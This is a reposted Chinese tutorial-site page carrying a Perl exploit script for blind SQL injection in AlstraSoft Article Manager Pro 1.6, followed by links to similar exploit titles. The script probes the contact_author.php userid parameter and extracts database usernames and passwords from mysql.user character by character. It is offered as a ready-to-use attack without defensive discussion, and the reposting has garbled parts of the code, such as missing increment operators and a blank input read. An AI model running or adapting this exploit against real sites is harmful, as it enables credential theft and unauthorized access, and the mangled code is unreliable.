手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit
摘要:#/usr/bin/perl#||Author:GoLd_M#--//-->#--AlstraSoftArticleManagerProBl...

#/usr/bin/perl

#| | Author: GoLd_M

#--//-->

# -- AlstraSoft Article Manager Pro Blind SQL Injection Exploit --

#--//--> Exploit :

use strict;

use LWP::Simple;print "- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -n";

print "- AlstraSoft Article Manager Pro Blind SQL Injection Exploit -n";

print " GoLd_M Mahmood_ali Tryag.cc/cc n";

print " - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -n";print "nEnter URL (ie: ): ";

chomp(my $url=);if(inject_test($url)) {

print "Injecting.. Please Wait this could take several minutes..nn";

my $details = blind($url);

print "Exploit Success! Admin Details: ".$details;

exit;

}sub blind {my $url = shift;

my $res = undef;

my $chr = 48;

my $substr = 1;

my $done = 1;while($done) {

my $content = get($url."/contact_author.php?userid=1) and ascii(substring((SELECT CONCAT(username,0x3a,password,0x5E) FROM

mysql.user),".$substr.",1))=".$chr."/*");if($content =~ /Previous/ && $chr == 94) { $done = 0; }

elsif($content =~ /Previous/) { $res .= chr($chr); $substr ; $chr = 48; }

else { $chr ; }

}

return $res;

}sub inject_test {my $url = shift;

my $true = get($url."/contact_author.php?userid=1) and 1=1 /*");

my $false = get($url."/contact_author.php?userid=1) and 1=2 /*");if($true =~ /Previous/ && $false !~ /Previous/) {

print "nTarget Site Vulnerable!nn";

return 1;

} else { print "nTarget Site Not Vulnerable! Exiting..n"; exit; }

}

【AlstraSoft Article Manager Pro 1.6 Blind SQL Injection Exploit】相关文章:

e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

入侵防护系统IPS怎么选择

躲避黑客的七大高招教程

IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit

MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit

Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit

DreamNews Manager (id) Remote SQL Injection Vulnerability

腾讯电脑管家签到赚积分的图文步骤

主流计算机病毒有哪些破坏方式

NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit

精品推荐
分类导航